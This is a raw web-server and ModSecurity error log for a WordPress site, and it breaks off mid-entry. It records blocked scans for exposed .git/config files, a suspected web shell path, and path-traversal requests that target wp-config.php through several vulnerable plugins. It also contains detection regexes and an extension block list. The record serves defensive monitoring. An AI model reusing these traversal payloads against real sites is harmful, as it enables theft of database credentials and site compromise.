[pid 3386:tid 140345688962944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 13 03:10:47.848160 2024] [ssl:warn] [pid 3389:tid 140345688962944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/13 06:48:12 [error] 3368#3368: *449106 access forbidden by rule, client: 83.147.52.42, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/13 11:28:28 [error] 3368#3368: *452340 access forbidden by rule, client: 83.147.52.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/05/13 12:40:16 [error] 3367#3367: *453161 access forbidden by rule, client: 83.147.52.37, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/13 12:41:30 [error] 3368#3368: *453168 access forbidden by rule, client: 83.147.52.37, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue May 14 03:33:18.111964 2024] [ssl:warn] [pid 27284:tid 140035805202304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 14 03:33:22.387957 2024] [ssl:warn] [pid 27290:tid 140035805202304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 14 03:33:22.884030 2024] [ssl:warn] [pid 27290:tid 140035805202304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 14 03:33:25.610398 2024] [ssl:warn] [pid 27290:tid 140035805202304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 14 03:33:27.985530 2024] [ssl:warn] [pid 27765:tid 139954865551232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 14 03:33:41.318034 2024] [ssl:warn] [pid 27770:tid 139954865551232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/14 04:41:45 [error] 27747#27747: *462180 access forbidden by rule, client: 83.147.52.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue May 14 06:38:37.829226 2024] [:error] [pid 27789:tid 139954453669632] [client 41.216.188.206:56402] [client 41.216.188.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-term.php"] [unique_id "ZkNNPZWdjdof0gmZ43fbjwAAAFM"], referer: https://www.google.com [Tue May 14 06:38:50.259076 2024] [:error] [pid 27789:tid 139954420098816] [client 41.216.188.206:56404] [client 41.216.188.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-term.php"] [unique_id "ZkNNSpWdjdof0gmZ43fbkAAAAFc"], referer: https://www.google.com 2024/05/14 10:59:09 [error] 27747#27747: *465652 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/14 10:59:09 [error] 27747#27747: *465653 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/14 11:51:20 [error] 27746#27746: *466200 access forbidden by rule, client: 83.147.52.37, server: webmail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/14 11:51:40 [error] 27747#27747: *466201 access forbidden by rule, client: 83.147.52.37, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed May 15 01:53:00.460934 2024] [autoindex:error] [pid 8855:tid 139954504025856] [client 20.172.9.8:51222] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 15 03:11:19.445272 2024] [ssl:warn] [pid 12308:tid 140523699341184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 03:11:31.670700 2024] [ssl:warn] [pid 12312:tid 140523699341184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 03:11:32.212795 2024] [ssl:warn] [pid 12312:tid 140523699341184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 03:11:34.508356 2024] [ssl:warn] [pid 12312:tid 140523699341184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 03:11:36.793534 2024] [ssl:warn] [pid 12731:tid 139922462939008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 03:11:44.992386 2024] [ssl:warn] [pid 12735:tid 139922462939008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 07:25:50.944990 2024] [autoindex:error] [pid 12753:tid 139922006517504] [client 4.242.221.96:54656] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 15 08:05:47.722394 2024] [autoindex:error] [pid 12753:tid 139922065266432] [client 64.227.139.219:55078] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 15 19:03:33.022108 2024] [ssl:warn] [pid 12735:tid 139922462939008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 15 19:58:59.774479 2024] [autoindex:error] [pid 16114:tid 139922263406336] [client 159.223.34.107:37560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 16 03:41:43.305909 2024] [ssl:warn] [pid 5670:tid 140262546548608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 03:41:51.579664 2024] [ssl:warn] [pid 5672:tid 140262546548608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 03:41:52.037441 2024] [ssl:warn] [pid 5672:tid 140262546548608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 03:41:54.193589 2024] [ssl:warn] [pid 5672:tid 140262546548608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 03:41:56.403245 2024] [ssl:warn] [pid 6089:tid 139933138880384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 03:42:04.677799 2024] [ssl:warn] [pid 6095:tid 139933138880384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 16 19:03:14.583729 2024] [ssl:warn] [pid 6095:tid 139933138880384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 00:07:41.708605 2024] [:error] [pid 31712:tid 139932769146624] [client 41.216.188.18:42078] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-term.php"] [unique_id "ZkbmHbWjBZw304umzup_SgAAAM4"], referer: https://www.google.com [Fri May 17 00:07:43.630390 2024] [:error] [pid 31615:tid 139932947740416] [client 41.216.188.18:42080] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-term.php"] [unique_id "ZkbmH7DqpXqW5zrWUroV-gAAAIE"], referer: https://www.google.com [Fri May 17 00:07:45.192472 2024] [:error] [pid 31712:tid 139932693612288] [client 41.216.188.18:42082] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-term.php"] [unique_id "ZkbmIbWjBZw304umzup_SwAAANc"], referer: https://www.google.com [Fri May 17 03:12:20.942973 2024] [ssl:warn] [pid 25112:tid 140482340898688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 03:12:29.184157 2024] [ssl:warn] [pid 25124:tid 140482340898688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 03:12:29.792913 2024] [ssl:warn] [pid 25124:tid 140482340898688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 03:12:32.219999 2024] [ssl:warn] [pid 25124:tid 140482340898688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 03:12:34.498088 2024] [ssl:warn] [pid 25552:tid 139872243844992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 03:12:42.694576 2024] [ssl:warn] [pid 25560:tid 139872243844992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:13.948834 2024] [ssl:warn] [pid 7808:tid 140211681933184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:18.161597 2024] [ssl:warn] [pid 7814:tid 140211681933184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:18.682454 2024] [ssl:warn] [pid 7814:tid 140211681933184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:20.627319 2024] [ssl:warn] [pid 7814:tid 140211681933184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:22.950795 2024] [ssl:warn] [pid 8273:tid 140325891073920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 06:16:31.175101 2024] [ssl:warn] [pid 8282:tid 140325891073920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 17 14:03:42.916812 2024] [:error] [pid 8308:tid 140325507004160] [client 82.102.26.62:33392] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZkeqDiiHs15nDF7H6GoAVQAAAI8"] [Fri May 17 14:03:55.659482 2024] [:error] [pid 8307:tid 140325431469824] [client 82.102.26.62:33430] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZkeqGxnTegMEbUYrnyHPngAAAFg"] [Fri May 17 14:03:57.499586 2024] [:error] [pid 8308:tid 140325574145792] [client 82.102.26.62:33436] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZkeqHSiHs15nDF7H6GoAXQAAAIc"] [Fri May 17 14:03:59.348761 2024] [:error] [pid 8437:tid 140325708326656] [client 82.102.26.62:33444] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZkeqHwHRq32rr8s-kdzkwAAAAMA"] [Fri May 17 14:03:59.492745 2024] [:error] [pid 8437:tid 140325439862528] [client 82.102.26.62:33446] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "ZkeqHwHRq32rr8s-kdzkwQAAANc"] [Fri May 17 14:04:10.691239 2024] [:error] [pid 8437:tid 140325691541248] [client 82.102.26.62:33470] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZkeqKgHRq32rr8s-kdzkxwAAAMI"] [Fri May 17 14:04:17.279805 2024] [:error] [pid 8437:tid 140325431469824] [client 82.102.26.62:33488] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZkeqMQHRq32rr8s-kdzkywAAANg"] [Fri May 17 14:04:17.431979 2024] [:error] [pid 8437:tid 140325515396864] [client 82.102.26.62:33490] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php"] [unique_id "ZkeqMQHRq32rr8s-kdzkzAAAAM4"] [Fri May 17 14:04:22.217253 2024] [:error] [pid 8308:tid 140325532182272] [client 82.102.26.62:33504] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZkeqNiiHs15nDF7H6GoAZQAAAIw"] [Fri May 17 14:04:23.277922 2024] [:error] [pid 8307:tid 140325481826048] [client 82.102.26.62:33508] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "ZkeqNxnTegMEbUYrnyHPpAAAAFI"] [Fri May 17 14:04:23.432006 2024] [:error] [pid 8437:tid 140325565753088] [client 82.102.26.62:33510] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ 